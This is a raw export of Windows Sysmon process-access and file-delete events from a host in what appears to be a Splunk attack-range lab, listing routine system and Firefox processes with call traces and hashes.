Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000043200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.635{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D1CD4FF03270A11ECF0208DF5A9DD8,SHA256=5A132A72E2C41404E1DAF3CD7728DCC3A4F4AE40EF4F3018EB3B8E566F81A02E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.631{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E9639BE1A56F79500374F22D160BBB7,SHA256=03C05C9095AAC262F20BF3D5634B9E2A0AD2DE7714C0951E0671715B36B39335,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.624{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4006-00000000AF02}6444C:\Windows\system32\conhost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.624{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4006-00000000AF02}6444C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.624{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-4006-00000000AF02}6444C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.619{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.619{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.619{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.542{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.532{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.532{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.532{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.532{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.532{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8925952C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.527{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.527{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.512{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.509{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.496{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.495{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.495{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.468{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.468{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 